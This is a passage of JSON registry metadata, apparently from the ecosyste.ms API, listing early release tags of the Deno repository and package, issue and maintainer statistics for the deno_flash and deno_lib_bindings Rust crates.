ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:12:57.862Z","dependent_packages_count":4,"downloads":89564,"downloads_period":"total","dependent_repos_count":4,"rankings":{"downloads":8.903545552760212,"dependent_repos_count":10.531727490606123,"dependent_packages_count":7.415416020867198,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":6.760086466222242,"average":5.611869230245257},"purl":"pkg:cargo/deno_flash","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_flash","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_flash","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_flash/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_flash/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-08T05:50:47.927Z","updated_at":"2022-11-08T05:50:47.927Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T05:50:51.929Z","updated_at":"2022-11-08T05:50:51.929Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:27.808Z","updated_at":"2023-07-18T22:41:27.808Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047439,"name":"deno_lib_bindings","ecosystem":"cargo","description":"Official library for deno native bindings","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2019-05-27T17:51:40.651Z","latest_release_published_at":"2019-05-27T17:51:40.651Z","latest_release_number":"0.0.0","last_synced_at":"2026-09-07T22:53:48.542Z","created_at":"2022-04-12T10:00:47.413Z","updated_at":"2026-09-07T22:53:48.542Z","registry_url":"https://crates.io/crates/deno_lib_bindings/","install_command":"cargo install deno_lib_bindings","documentation_url":"https://docs.rs/deno_lib_bindings/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.m